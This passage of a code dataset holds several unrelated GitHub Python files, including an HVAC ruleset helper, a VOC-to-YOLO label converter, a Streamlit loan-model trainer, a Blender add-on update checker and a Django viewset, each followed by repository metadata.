    """Tell whether the HVAC system's preheat system heats via a fluid loop.

    Parameters
    ----------
    rmi_b : json
        RMD at RuleSetModelInstance level
    hvac_b_id : str
        The HVAC system ID.

    Returns
    -------
    bool
        True when the preheat system exists, has a hot water loop, and its
        heating type is FLUID_LOOP; False in every other case.
    """
    hvac_b = find_exactly_one_hvac_system(rmi_b, hvac_b_id)
    preheat_system = hvac_b.get("preheat_system")
    # No preheat system, or no hot water loop attached to it -> not a fluid loop.
    if preheat_system is None or preheat_system.get("hot_water_loop") is None:
        return False
    # find_one yields None when the heating type is missing from the RMD,
    # which simply fails the comparison (silent fail, as intended).
    return find_one("type", preheat_system) == HEATING_SYSTEM.FLUID_LOOP
| pnnl/ruleset-checking-tool | rct229/rulesets/ashrae9012019/ruleset_functions/baseline_systems/baseline_hvac_sub_functions/is_hvac_sys_preheating_type_fluid_loop.py | is_hvac_sys_preheating_type_fluid_loop.py | py | 1,297 | python | en | code | 6 | github-code | 13 |
18954514941 | import requests
import time
def download_link(url: str) -> None:
    """Fetch *url* synchronously and print how many bytes were received."""
    body = requests.get(url).content
    print(f'Read {len(body)} from {url}')
def download_all(urls: list) -> None:
    """Download every URL in *urls*, one after another."""
    for link in urls:
        download_link(link)
# 100 requests in total: the same two sites, 50 times each.
url_list = ["https://www.google.com/", "https://www.bing.com"] * 50
# time.perf_counter() is monotonic and high-resolution; time.time() can jump
# when the system clock is adjusted, which corrupts interval measurements.
start = time.perf_counter()
download_all(url_list)
end = time.perf_counter()
print(f'download {len(url_list)} links in {end - start} seconds')
33527904676 | import xml.etree.ElementTree as ET
import pickle
import os
from os import listdir, getcwd
from os.path import join
def convert(size, box):
    """Convert a VOC box to normalized YOLO (x_center, y_center, w, h).

    *size* is (image_width, image_height); *box* is (xmin, xmax, ymin, ymax)
    in pixels. All returned values are fractions of the image size.
    """
    img_w, img_h = size
    xmin, xmax, ymin, ymax = box
    x = (xmin + xmax) / 2.0 / img_w
    y = (ymin + ymax) / 2.0 / img_h
    w = (xmax - xmin) / img_w
    h = (ymax - ymin) / img_h
    return (x, y, w, h)
def convert_annotation(xml_files_path, save_txt_files_path, classes):
    """Convert every VOC XML annotation in *xml_files_path* to a YOLO .txt file.

    Each output line is "<class_id> <x> <y> <w> <h>" with coordinates
    normalized by the image size (via ``convert``). Objects whose class is
    not listed in *classes*, or that are flagged difficult, are skipped.
    """
    xml_files = os.listdir(xml_files_path)
    print(xml_files)
    for xml_name in xml_files:
        print(xml_name)
        xml_file = os.path.join(xml_files_path, xml_name)
        out_txt_path = os.path.join(save_txt_files_path, xml_name.split('.')[0] + '.txt')
        tree = ET.parse(xml_file)
        root = tree.getroot()
        size = root.find('size')
        w = int(size.find('width').text)
        h = int(size.find('height').text)
        # BUG FIX: the output file handle was opened but never closed; the
        # context manager guarantees flush/close even if parsing raises.
        with open(out_txt_path, 'w') as out_txt_f:
            for obj in root.iter('object'):
                difficult = obj.find('difficult').text
                cls = obj.find('name').text
                if cls not in classes or int(difficult) == 1:
                    continue
                cls_id = classes.index(cls)
                xmlbox = obj.find('bndbox')
                b = (float(xmlbox.find('xmin').text), float(xmlbox.find('xmax').text),
                     float(xmlbox.find('ymin').text), float(xmlbox.find('ymax').text))
                # b = (xmin, xmax, ymin, ymax)
                print(w, h, b)
                bb = convert((w, h), b)
                out_txt_f.write(str(cls_id) + " " + " ".join([str(a) for a in bb]) + '\n')
if __name__ == "__main__":
    # Class names must match the <name> tags in the VOC XML files; the YOLO
    # class id written to each .txt label is the index of the name in this
    # list, so the order matters.
    # (Earlier revisions kept many alternative class lists here, including a
    # duplicate `classes1` assignment that was immediately overwritten; those
    # dead definitions were removed.)
    classes1 = ['cebiao_1', 'cebiao_2', 'cebiao2_1', 'cebiao2_2', 'cebiao3_1', 'cebiao3_2',
                'wsb_tanjinghei_1', 'wsb_tanjinghei_2', 'wsb_kaqibai_1', 'wsb_kaqibai_2',
                'wsb_kejihui_1', 'wsb_kejihui_2', 'wsb_tanjinghei2_1', 'wsb_tanjinghei2_2',
                'wsb_kaqibai2_1', 'wsb_kaqibai2_2', 'wsb_kejihui2_1', 'wsb_kejihui2_2',
                'wsb_ganlanhui_1', 'wsb_ganlanhui_2', 'wsb_yizeyin_1', 'wsb_yizeyin_2',
                'wsb_haiyanhui_1', 'wsb_haiyanhui_2', 'wsb_hei_1', 'wsb_hei_2', 'wsb_bai_1',
                'wsb_bai_2', 'wsb_tanjinghei3_1', 'wsb_tanjinghei3_2', 'wsb_kaqibai3_1',
                'wsb_kaqibai3_2', 'wsb_laiyinlan_1', 'wsb_laiyinlan_2', 'wsb_huanyinghui_1',
                'wsb_huanyinghui_2', 'wsb_luolanzi_1', 'wsb_luolanzi_2', 'wsb_xueshihong_1',
                'wsb_xueshihong_2', 'wsb_nasidakeyin_1', 'wsb_nasidakeyin_2', 'wsb_jiguanglv_1',
                'wsb_jiguanglv_2', 'shenyelan_1', 'shenyelan_2', 'wsb_jiguanglv2_1',
                'wsb_jiguanglv2_2', 'wsb_kejihui3_1', 'wsb_kejihui3_2', 'cebiao4',
                'wsb_jiguanglv3_1', 'wsb_jiguanglv3_2', 'dangshui', 'dangshui2', 'dangshui3']
    # Directory holding the VOC-format XML label files.
    xml_files1 = r'D:\xzy\pycharm-workspace\yolov5-6.0\data\230627_chaoyi_dangshui\0627finall\labels_xml\val'
    # Directory where the converted YOLO-format .txt labels are written.
    save_txt_files1 = r'D:\xzy\pycharm-workspace\yolov5-6.0\data\230627_chaoyi_dangshui\0627finall\labels\val'
    convert_annotation(xml_files1, save_txt_files1, classes1)
43082351496 | import streamlit as st
import pandas as pd
import numpy as np
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.tree import DecisionTreeClassifier
from xgboost import XGBClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
from sklearn.metrics import plot_confusion_matrix, plot_roc_curve, plot_precision_recall_curve
from sklearn.metrics import precision_score, recall_score
import os
def write():
    """Render the "Model Training For Loan Approval" Streamlit page.

    Loads the bank-loan dataset, lets the user pick a classifier and tune its
    hyperparameters from the sidebar, then trains the model and reports
    accuracy / precision / recall plus any evaluation plots the user ticked.
    """
    BASE_DIR = os.path.dirname(os.path.abspath(__file__))

    # Front-end header of the web page.
    html_temp = """
    <div style ="background-color:#F63366;padding:15px;margin:15px">
    <h2 style ="text-align:center;">Model Training For Loan Approval </h2>
    </div>
    """
    # display the front end aspect
    st.markdown(html_temp, unsafe_allow_html=True)

    @st.cache(persist=True)
    def load_data():
        """Load bankloan.csv, drop the ID column and impute missing values."""
        data = pd.read_csv(os.path.join(BASE_DIR, "bankloan.csv"))
        data = data.drop('Loan_ID', axis=1)
        # Handle missing values: random 0/1 for the binary-coded columns,
        # median/mean for the numeric ones.
        data.Credit_History.fillna(np.random.randint(0, 2), inplace=True)
        data.Married.fillna(np.random.randint(0, 2), inplace=True)
        data.LoanAmount.fillna(data.LoanAmount.median(), inplace=True)
        data.Loan_Amount_Term.fillna(data.Loan_Amount_Term.mean(), inplace=True)
        data.Gender.fillna(np.random.randint(0, 2), inplace=True)
        data.Dependents.fillna(data.Dependents.median(), inplace=True)
        data.Self_Employed.fillna(np.random.randint(0, 2), inplace=True)
        return data

    @st.cache(persist=True)
    def split(df):
        """One-hot encode the features, map the label to 1/0 and split 70/30."""
        pre_x = df.iloc[:, :-1]
        pre_y = df.iloc[0:, -1]
        # Handle label data: dummies for categoricals, Y/N -> 1/0 for target.
        x = pd.get_dummies(pre_x)
        y = pre_y.map(dict(Y=1, N=0))
        x_train, x_test, y_train, y_test = train_test_split(
            x, y, test_size=0.3, random_state=10)
        return x_train, x_test, y_train, y_test

    def plot_metrics(model, X_eval, y_eval, metrics_list):
        """Draw whichever evaluation plots the user selected."""
        # NOTE(review): plot_confusion_matrix/plot_roc_curve/... are deprecated
        # in recent scikit-learn; the *Display.from_estimator APIs replace them.
        if 'Confusion Matrix' in metrics_list:
            st.subheader("Confusion Matrix")
            plot_confusion_matrix(model, X_eval, y_eval, display_labels=class_names)
            st.pyplot()
        if 'ROC Curve' in metrics_list:
            st.subheader("ROC Curve")
            plot_roc_curve(model, X_eval, y_eval)
            st.pyplot()
        if 'Precision-Recall Curve' in metrics_list:
            st.subheader('Precision-Recall Curve')
            plot_precision_recall_curve(model, X_eval, y_eval)
            st.pyplot()

    def train_and_report(title, model, metrics_list, X_tr, X_ev):
        """Fit *model* on X_tr, report accuracy/precision/recall on X_ev."""
        st.success(title)
        model.fit(X_tr, y_train)
        accuracy = model.score(X_ev, y_test)
        y_pred = model.predict(X_ev)
        st.write("Accuracy: ", accuracy.round(2))
        st.write("Precision: ", precision_score(
            y_test, y_pred, labels=class_names).round(2))
        st.write("Recall: ", recall_score(
            y_test, y_pred, labels=class_names).round(2))
        plot_metrics(model, X_ev, y_test, metrics_list)

    df = load_data()
    class_names = ["Approved", 'Rejected']
    x_train, x_test, y_train, y_test = split(df)

    st.sidebar.subheader("Choose Classifier")
    classifier = st.sidebar.selectbox("Classifier",
                                      ("XGBClassifier", "Support Vector Machine (SVM)", "Logistic Regression",
                                       "Random Forest", "GradientBoostingClassifier",
                                       "K-Nearest Neighbor", "Decision Tree", "Neural Network"))

    if classifier == 'XGBClassifier':
        st.sidebar.subheader("Hyperparameters Tuning")
        learning_rate = st.sidebar.number_input("learning_rate", 0.05, 0.3, step=.05,
                                                key='learning_rate')
        min_child_weigh = st.sidebar.number_input("min_child_weigh", 1, 7, step=1,
                                                  key='min_child_weigh')
        gamma = st.sidebar.number_input("gamma", 0.0, 0.4, step=0.1,
                                        key='gamma')
        colsample_bytree = st.sidebar.number_input("colsample_bytree", 0.3, 0.7, step=0.1,
                                                   key='colsample_bytree')
        n_estimators = st.sidebar.number_input("n_estimators", 100, 5000, step=10,
                                               key='n_estimators')
        max_depth = st.sidebar.number_input(
            "The maximum depth of the tree", 3, 10, step=1, key='max_depth')
        metrics = st.multiselect("What metrics to plot?",
                                 ('Confusion Matrix', 'ROC Curve',
                                  'Precision-Recall Curve'))
        if st.button("Classify", key='classify'):
            # BUG FIX: the keyword was misspelled "min_child_weigh", which
            # XGBoost silently ignored -- the slider had no effect on training.
            model = XGBClassifier(learning_rate=learning_rate,
                                  min_child_weight=min_child_weigh,
                                  gamma=gamma,
                                  n_estimators=n_estimators,
                                  max_depth=max_depth,
                                  colsample_bytree=colsample_bytree)
            train_and_report("XGBClassifier Results", model, metrics, x_train, x_test)

    if classifier == 'Support Vector Machine (SVM)':
        st.sidebar.subheader("Hyperparameters Tuning")
        # choose parameters
        C = st.sidebar.number_input("C (Regularization parameter)",
                                    0.01, 10.0, step=0.01, key='C_SVM')
        kernel = st.sidebar.radio("Kernel", ("rbf", "linear"), key='kernel')
        gamma = st.sidebar.radio(
            "Gamma (Kernel Coefficient)", ("scale", "auto"), key='gamma')
        metrics = st.multiselect("What metrics to plot?",
                                 ('Confusion Matrix', 'ROC Curve', 'Precision-Recall Curve'))
        if st.button("Classify", key='classify'):
            model = SVC(C=C, kernel=kernel, gamma=gamma)
            train_and_report("Support Vector Machine (SVM) Results", model, metrics, x_train, x_test)

    if classifier == 'Logistic Regression':
        st.sidebar.subheader("Hyperparameters Tuning")
        C = st.sidebar.number_input(
            "C (Regularization parameter)", 0.01, 10.0, step=0.01, key='C_LR')
        max_iter = st.sidebar.slider(
            "Maximum number of iterations", 100, 500, key='max_iter')
        metrics = st.multiselect("What metrics to plot?",
                                 ('Confusion Matrix', 'ROC Curve', 'Precision-Recall Curve'))
        if st.button("Classify", key='classify'):
            model = LogisticRegression(C=C, penalty='l2', max_iter=max_iter)
            train_and_report("Logistic Regression Results", model, metrics, x_train, x_test)

    if classifier == 'Random Forest':
        st.sidebar.subheader("Hyperparameters Tuning")
        n_estimators = st.sidebar.number_input("The number of trees in the forest", 100, 5000, step=10,
                                               key='n_estimators')
        max_depth = st.sidebar.number_input(
            "The maximum depth of the tree", 1, 20, step=1, key='max_depth')
        bootstrap = st.sidebar.radio(
            "Bootstrap samples when building trees", ('True', 'False'), key='bootstrap')
        metrics = st.multiselect("What metrics to plot?",
                                 ('Confusion Matrix', 'ROC Curve', 'Precision-Recall Curve'))
        if st.button("Classify", key='classify'):
            # BUG FIX: st.sidebar.radio returns the *string* 'True'/'False';
            # passing it straight through made bootstrap always truthy.
            model = RandomForestClassifier(n_estimators=n_estimators, max_depth=max_depth,
                                           bootstrap=(bootstrap == 'True'),
                                           n_jobs=-1)
            train_and_report("Random Forest Results", model, metrics, x_train, x_test)

    if classifier == 'GradientBoostingClassifier':
        st.sidebar.subheader("Hyperparameters Tuning")
        n_estimators = st.sidebar.number_input("n_estimators", 100, 5000, step=10,
                                               key='n_estimators')
        max_depth = st.sidebar.number_input(
            "The maximum depth of the tree", 3, 15, step=1, key='max_depth')
        metrics = st.multiselect("What metrics to plot?",
                                 ('Confusion Matrix', 'ROC Curve', 'Precision-Recall Curve'))
        if st.button("Classify", key='classify'):
            model = GradientBoostingClassifier(
                n_estimators=n_estimators, max_depth=max_depth)
            train_and_report("GradientBoostingClassifier Results", model, metrics, x_train, x_test)

    if classifier == 'K-Nearest Neighbor':
        st.sidebar.subheader("Hyperparameters Tuning")
        # NOTE(review): 'criterion' is not a KNeighborsClassifier parameter;
        # the widget is kept for UI compatibility but its value is unused.
        criterion = st.sidebar.selectbox("criterion", ("gini", "entropy"))
        n_neighbors = st.sidebar.number_input("Number of neighbors, K", 1, 428, step=1,
                                              key='n_neighbors')
        metrics = st.multiselect("What metrics to plot?",
                                 ('Confusion Matrix', 'ROC Curve', 'Precision-Recall Curve'))
        if st.button("Classify", key='classify'):
            model = KNeighborsClassifier(n_neighbors=n_neighbors)
            train_and_report("K-Nearest Neighbor Results", model, metrics, x_train, x_test)

    if classifier == 'Decision Tree':
        st.sidebar.subheader("Hyperparameters Tuning")
        max_depth = st.sidebar.number_input(
            "The maximum depth of the tree", 2, 16, step=2, key='max_depth')
        max_leaf_nodes = st.sidebar.number_input("Maximum leaf node", 2, 20, step=1,
                                                 key='max_leaf_nodes')
        metrics = st.multiselect("What metrics to plot?",
                                 ('Confusion Matrix', 'ROC Curve', 'Precision-Recall Curve'))
        if st.button("Classify", key='classify'):
            # BUG FIX: max_depth was collected from the sidebar but never
            # passed to the model.
            model = DecisionTreeClassifier(max_depth=max_depth, max_leaf_nodes=max_leaf_nodes)
            train_and_report("Decision Tree Results", model, metrics, x_train, x_test)

    if classifier == 'Neural Network':
        st.sidebar.subheader("Hyperparameters Tuning")
        solver = st.sidebar.radio(
            "Solver", ("lbfgs", "sgd", "adam"), key='solver')
        alpha = st.sidebar.number_input(
            "Regularization parameter", 0.000001, 10.0000, key='alpha')
        metrics = st.multiselect("What metrics to plot?",
                                 ('Confusion Matrix', 'ROC Curve', 'Precision-Recall Curve'))
        if st.button("Classify", key='classify'):
            # MLPs are scale sensitive: standardize features before training.
            scaler = StandardScaler()
            scaler.fit(x_train)
            X_train = scaler.transform(x_train)
            X_test = scaler.transform(x_test)
            model = MLPClassifier(solver=solver, alpha=alpha,
                                  hidden_layer_sizes=(5, 2), random_state=1)
            # BUG FIX: accuracy was previously computed on the *unscaled*
            # x_test while the model was trained on scaled data; evaluate on
            # the scaled X_test instead.
            train_and_report("Neural Network Results", model, metrics, X_train, X_test)

    if st.sidebar.checkbox("Show raw data", False):
        # NOTE(review): the subheader text mentions the Adult Income data set
        # but the frame shown is the bank-loan data -- confirm intended label.
        st.subheader("Adult Income Data Set (Classification)")
        st.write(df)
if __name__ == '__main__':
write()
| mdsac1441/final_year_project | pages/LA/la_pages/MA/ma_pages/MT/mt.py | mt.py | py | 13,883 | python | en | code | 0 | github-code | 13 |
70336392018 | import numpy as np
from analyzer.record_type import RecordType
from analyzer.git_dao import *
# To speed up features obtaining better to keep them in numpy arrays.
# In this case we have to know size or record and position of features in vector before start to parse them.
class Features(object):
    """
    Base class for features. All fields are features names.
    Each field is 'int' type with index of related feature in record.
    Should be extended with `__slots__ = Features.__slots__ + ('FOO',)`.
    Vocabulary based features should have "V_" prefix.
    """
    __slots__ = ('RC_ID',)

    def __init__(self):
        # Assign each slot its position, so FEATURE_NAME -> index in record.
        for index, slot in enumerate(self.__slots__):
            setattr(self, slot, index)
def is_vocabulary_feature(feature_name: str) -> bool:
    """Tell whether *feature_name* denotes a vocabulary-backed feature ("V_" prefix)."""
    return feature_name[:2] == "V_"
class RecordsProducer(object):
    """
    Base class to parse specific set of features from git DAO-s.
    Provides ability to keep features for one record in Numpy array of pre-known size, build template for such record
    and set values into record array with `record[self.features.FOO] = bar` syntax.
    Defining one feature takes constant time and doesn't depend (very) from amount of features.
    Also it handles vocabulary-based features. See `add_vocabulary_feature_value` method.
    To override. Keep in mind that amount of time required for analyzing very depends from this class implementation.
    """
    __slots__ = ('record_type', 'features', 'features_number', 'vocabulary_features',)

    def __init__(self, record_type: RecordType, features: Features):
        self.record_type = record_type
        self.features = features
        self.features_number = len(features.__slots__)
        # One optional dict per feature: vocabulary item -> its stable index.
        self.vocabulary_features = np.empty(self.features_number, dtype=object)
        self.vocabulary_features.fill(None)

    def get_feature_names(self) -> list:
        # First slot is the name of the output class (RC_ID), not a feature.
        return list(self.features.__slots__)[1:]

    def get_row_container(self) -> np.ndarray:
        """
        :return: Numpy array for one record with 0 value for all features.
        """
        return np.zeros(self.features_number, dtype=np.int16)

    def add_vocabulary_feature_value(self, feature: int, vocabulary_item: str, record: np.ndarray):
        """
        Adds into inner 'vocabulary_features' numpy 2D array vocabulary feature.
        :param feature: Feature index. Should has "V_" prefix.
        :param vocabulary_item: Value from vocabulary.
        :param record: Record to set feature value into.
        """
        feature_vocabulary: dict = self.vocabulary_features[feature]
        if feature_vocabulary is None:
            # First item ever seen for this feature: start its vocabulary.
            feature_vocabulary = dict()
            feature_vocabulary[vocabulary_item] = 0  # Index is 0 because dictionary has only one key.
            self.vocabulary_features[feature] = feature_vocabulary
            record[feature] = 0  # It is index in feature_vocabulary.
        else:
            item_index = feature_vocabulary.get(vocabulary_item)
            if item_index is None:  # No such item in vocabulary.
                # Dictionary is appended only, so unique index = current length.
                item_index = len(feature_vocabulary)
                feature_vocabulary[vocabulary_item] = item_index
            record[feature] = item_index

    @staticmethod
    def check_binary_line(line: str) -> bool:
        """Heuristic: a NUL byte or any non-ASCII character marks binary content."""
        return "\x00" in line or any(ord(x) > 0x80 for x in line)

    def analyze_git_file_recursively(self, file: GitFile, is_diff_hunk=False) -> list:
        """
        Analyzes specified 'GitFile'. Returns list of numpy arrays-records.
        Don't use 2D numpy array because need to append and extend list of records.
        :param file: 'GitFile' to analyze.
        :param is_diff_hunk: Flag that we are interested only in last line in first piece in file.
        :return: List of numpy arrays with parsed records.
        """
        records = []
        file_level_features = self.analyze_git_file(file)
        for piece in file.pieces:
            piece_level_features = self.analyze_git_piece(file_level_features, piece)
            # Set what to handle.
            lines = piece.lines
            if is_diff_hunk:
                lines = lines[-1:]
            # Handle chosen lines.
            is_first_line = True
            for line in lines:
                if is_first_line:
                    is_first_line = False
                    # BUG FIX: check_binary_line returns bool, never None, so
                    # the original `is None` comparison never skipped binary
                    # files. Skip the piece when the first line looks binary.
                    if self.check_binary_line(line.line):
                        break  # Don't check binary files.
                line_level_features = self.analyze_git_line(piece_level_features, line)
                records.append(line_level_features)  # Save features.
        return records

    # To override.
    def analyze_git_file(self, file: GitFile) -> np.ndarray:
        """
        Analyzes specified 'GitFile'.
        :param file: 'GitFile' to parse.
        :return: 1D numpy array with parsed record.
        """
        # BUG FIX: referenced nonexistent `self.features_keeper` (impossible
        # under __slots__); the row container lives on this class itself.
        return self.get_row_container()

    # To override.
    def analyze_git_piece(self, file_level_features, piece: GitPiece) -> np.ndarray:
        """
        Analyzes specified 'GitPiece'.
        :param file_level_features: Numpy 1D array of already analyzed features.
        :param piece: 'GitPiece' to parse.
        :return: 1D numpy array with parsed record.
        """
        return np.copy(file_level_features)

    # To override.
    def analyze_git_line(self, piece_level_features, line: GitLine) -> np.ndarray:
        """
        Analyzes specified 'GitLine'.
        :param piece_level_features: Numpy 1D array of already analyzed features.
        :param line: 'GitLine' to parse.
        :return: 1D numpy array with parsed record.
        """
        return np.copy(piece_level_features)
| AlexanderMakarov/GitHubParser | analyzer/records_producer.py | records_producer.py | py | 5,828 | python | en | code | 0 | github-code | 13 |
21675820972 | """
단순한 구현문제이다.
방향 전환과 전진을 하면서 각 좌표의 최대 최소를 구해 가로 길이와
세로 길이를 구해 넓이를 계산한다.
문제를 제대로 읽지 않아 계속적인 실수가 발생했다.
문제를 좀 더 꼼꼼히 읽는 습관을 들이자.
"""
import sys
input = sys.stdin.readline  # faster stdin reads for competitive judging

# Direction vectors indexed by heading d: 0=up, 1=right, 2=down, 3=left.
dx = [-1, 0, 1, 0]
dy = [0, 1, 0, -1]

for i in range(int(input())):
    # Track every visited coordinate (starting at the origin) so the
    # bounding-box area of the path can be computed afterwards.
    storeX, storeY = [0], [0]
    d, cx, cy = 0, 0, 0
    for cmd in list(input().rstrip()):
        if cmd == 'F':
            # Move forward one step in the current heading.
            cx, cy = cx+dx[d], cy+dy[d]
            storeX.append(cx)
            storeY.append(cy)
        elif cmd == 'B':
            # Move backward one step without changing heading.
            cx, cy = cx-dx[d], cy-dy[d]
            storeX.append(cx)
            storeY.append(cy)
        elif cmd == 'L':
            # Rotate 90 degrees counter-clockwise.
            d = (d-1)%4
        else:
            # Any other command ('T' here) rotates 90 degrees clockwise.
            d = (d+1)%4
    # Area of the axis-aligned bounding box covering the whole path.
    print((max(storeX)-min(storeX))*(max(storeY)-min(storeY)))
42970382934 | import bpy
import json
import re
import requests
class ExperimentalUpdateCheck:
"""Get release information over an API and convert it into data that can be used by Super Addon Manager."""
    def __init__(self, bl_info: dict) -> None:
        """Detect the hosting API (GitHub/GitLab) from the add-on's bl_info urls."""
        api, user_name, repo_name = self.get_user_and_repo(bl_info)
        # NOTE: despite the `str` annotation, `api` is None when no known
        # host could be detected; user_name/repo_name are then "".
        self.api: str = api
        self.user_name: str = user_name
        self.repo_name: str = repo_name
def get_user_and_repo(self, bl_info: dict) -> tuple:
"""Try to get the API type, user name and repository name from the bl_info."""
# Get the three urls that might be included in the bl_info.
urls = [bl_info.get("doc_url", ""), bl_info.get(
"wiki_url", ""), bl_info.get("tracker_url", "")]
api = None
user_name: str = ""
repo_name: str = ""
for u in urls:
# Search for a GitHub or GitLab Url.
# Both Urls have the scheme https://github.com/user/repo
match = re.search(
"(git(?:hub|lab)).com/([a-zA-Z0-9_-]+)/([a-zA-Z0-9_-]+)", u)
if match == None:
continue
api, user_name, repo_name = match.groups()
api = api.upper() # Convert the API to Uppercase for further use.
return api, user_name, repo_name
def get_data(self) -> dict:
"""Get the data in the form of an endpoint using either GitHubs or GitLabs API."""
# Get the preferences of Super Addon Manager.
prefs = bpy.context.preferences.addons[__package__.split(".")[
0]].preferences
# Don't try to get any data, if no API is specified.
if not self.api:
return
if self.api == "GITHUB":
return self._get_github_data(prefs.use_experimental_installer)
if self.api == "GITLAB":
return self._get_gitlab_data(prefs.use_experimental_installer)
return
    def _get_github_data(self, allow_automatic_download: bool) -> dict:
        """Request the necessary data from the GitHub API."""
        # Get the data from the GitHub releases API.
        res = requests.get(
            f"https://api.github.com/repos/{self.user_name}/{self.repo_name}/releases")
        if not res.ok:
            return  # ! Critical error
        data = json.loads(res.text)
        endpoint_data = {
            "schema_version": "super-addon-manager-version-info-1.0.0",
            "versions": []
        }
        # Iterate over the API data to convert it into data that can be used by Super Addon Manager.
        for d in data:
            d: dict
            # Skip unreleased versions.
            if d.get("draft", True) or d.get("prerelease", True):
                print("Skipping - Draft or Prerelease")
                continue
            # Get the version number and the download url.
            version_string = d.get("tag_name", "")
            download_url = d.get("html_url", "")
            if allow_automatic_download:
                # Point straight at the auto-generated source zip for this tag.
                download_url = f"https://github.com/{self.user_name}/{self.repo_name}/archive/refs/tags/{version_string}.zip"
            # Skip versions without version number or download url.
            if version_string == "" or download_url == "":
                continue
            version_array = self.get_version_array(version_string)
            # A malformed tag aborts the whole conversion (None result).
            # NOTE(review): if get_version_array can return None, len() here
            # raises TypeError instead -- confirm its contract.
            if len(version_array) != 3:
                return  # ! Critical error
            # Add version to the endpoint data.
            endpoint_data["versions"].append({
                "version": list(version_array),
                "download_url": download_url,
                "allow_automatic_download": allow_automatic_download,
                # NOTE(review): uses the *running* Blender version as the
                # minimum -- presumably a stand-in; confirm intended value.
                "minimum_blender_version": list(self.pad_tuple(bpy.app.version)),
                "release_description": d.get("body", ""),
            })
        return endpoint_data
    def _get_gitlab_data(self, allow_automatic_download: bool) -> dict:
        """Request the necessary data from the GitLab API.

        :param allow_automatic_download: when True, prefer the release's
            zip source asset URL over the release page link.
        :return: endpoint-style dict with ``schema_version`` and ``versions``,
            or None on any request failure or malformed version tag.
        """
        # Request the data from the GitLab Users API to find out the project ID.
        # NOTE(review): this endpoint is paginated (20 projects by default);
        # repos beyond the first page will never match and project_id stays
        # "" — confirm pagination handling is not needed.
        res = requests.get(
            f"https://gitlab.com/api/v4/users/{self.user_name}/projects?simple=true")
        if not res.ok:
            return  # ! Critical error
        projects = json.loads(res.text)
        # Iterate over all user projects and compare the name to get the project ID.
        # This is necessary in order to get information on releases.
        project_id = ""
        for p in projects:
            if p["name"] == self.repo_name:
                project_id = p["id"]
                break
        # Get the data from the GitLab releases API.
        res = requests.get(
            f"https://gitlab.com/api/v4/projects/{project_id}/releases")
        if not res.ok:
            return  # ! Critical error
        data = json.loads(res.text)
        # NOTE(review): schema string differs from the GitHub branch
        # ("super-addon-manager-version-info-1.0.0") — confirm which
        # identifier consumers of this endpoint data expect.
        endpoint_data = {
            "schema_version": "super-addon-manager-1.0.0", "versions": []}
        for d in data:
            d: dict
            # Skip unreleased versions.
            if d.get("upcoming_release", True):
                continue
            # Get the version number and the download url.
            version_string = d.get("tag_name", "")
            download_url = d.get("_links", {"self": ""}).get("self", "")
            if allow_automatic_download:
                assets = d.get("assets", {"sources": []}).get("sources", [])
                # Iterate over all assets to get the url of the Zip-File.
                for a in assets:
                    if a.get("format", "") == "zip":
                        if a.get("url", None):
                            download_url = a.get("url", "")
            # Skip versions without version number or download url.
            if version_string == "" or download_url == "":
                continue
            version_array = self.get_version_array(version_string)
            # A single unparseable tag aborts the whole conversion.
            if len(version_array) != 3:
                return  # ! Critical Error
            # Add version to the endpoint data.
            endpoint_data["versions"].append({
                "version": list(version_array),
                "download_url": download_url,
                "allow_automatic_download": allow_automatic_download,
                "minimum_blender_version": list(self.pad_tuple(bpy.app.version)),
                "release_description": d.get("description", ""),
            })
        return endpoint_data
def get_version_array(self, version_string) -> list:
"""Extract a version number array from a tag name."""
# Search for a number with one to three parts, e.g. v1, 2.4 or version1.36.0
version_number = re.search("((?:\d+[\._-]){0,2}\d+)", version_string)
# Return an empty array, if no version number can be found.
if not version_number:
return []
try:
version_number = re.sub("[\._-]+", ".", version_number.group(0))
# Try to convert the version number to a list of length 3.
version_array = self.pad_tuple(
version_number.split("."))
return list(version_array)
except ValueError:
return []
def pad_tuple(self, t) -> tuple:
"""Convert a list into a tuple of three integers."""
# Convert all raw values to integers, to avoid issues, when comparing versions
def type_convert(x):
allowed_types = [int, float, str]
if type(x) in allowed_types:
return int(x)
raise ValueError
t = map(type_convert, t)
return (tuple(t) + (0, 0, 0))[:3]
| PidgeonTools/SuperAddonManager | objects/experimental_update_check.py | experimental_update_check.py | py | 7,646 | python | en | code | 2 | github-code | 13 |
5308155516 | class Solution(object):
def lengthOfLongestSubstring(self, s):
"""
:type s: str
:rtype: int
"""
length = len(s)
ans = 0
i = 0
map_char = {}
for j in range(length):
if s[j] in map_char:
i = max(map_char[s[j]], i)
ans = max(ans, j - i + 1)
map_char[s[j]] = j + 1
return ans
| Nrgeup/Algorithm-practice | leetcode/3.py | 3.py | py | 413 | python | en | code | 0 | github-code | 13 |
7830627880 | from django.db.models import Exists, OuterRef, Prefetch
from rest_framework import viewsets
from cl.api.pagination import TinyAdjustablePagination
from cl.api.utils import LoggingMixin, RECAPUsersReadOnly
from cl.disclosures.models import FinancialDisclosure
from cl.people_db.api_serializers import (
ABARatingSerializer,
AttorneySerializer,
EducationSerializer,
PartySerializer,
PersonDisclosureSerializer,
PersonSerializer,
PoliticalAffiliationSerializer,
PositionSerializer,
RetentionEventSerializer,
SchoolSerializer,
SourceSerializer,
)
from cl.people_db.filters import (
ABARatingFilter,
AttorneyFilter,
EducationFilter,
PartyFilter,
PersonDisclosureFilter,
PersonFilter,
PoliticalAffiliationFilter,
PositionFilter,
RetentionEventFilter,
SchoolFilter,
SourceFilter,
)
from cl.people_db.models import (
ABARating,
Attorney,
Education,
Party,
Person,
PoliticalAffiliation,
Position,
RetentionEvent,
School,
Source,
)
class PersonDisclosureViewSet(viewsets.ModelViewSet):
    """People that have at least one financial disclosure.

    The queryset is tuned for the disclosure UI: it excludes aliases,
    prefetches disclosures and court positions to avoid per-row query
    floods, and loads only the name/photo/DOB fields the serializer needs.
    """

    queryset = (
        Person.objects.filter(
            # Only return people that have disclosure sub-objects
            Exists(
                FinancialDisclosure.objects.filter(
                    person=OuterRef("pk"),
                ).only("pk")
            ),
            # Don't include aliases
            is_alias_of=None,
        )
        .prefetch_related(
            # Prefetch disclosures and positions to avoid query floods
            Prefetch(
                "financial_disclosures",
                queryset=FinancialDisclosure.objects.all()
                .only("year", "id", "person_id")
                .order_by("-year"),
                to_attr="disclosures",
            ),
            Prefetch(
                "positions",
                queryset=Position.objects.filter(court__isnull=False)
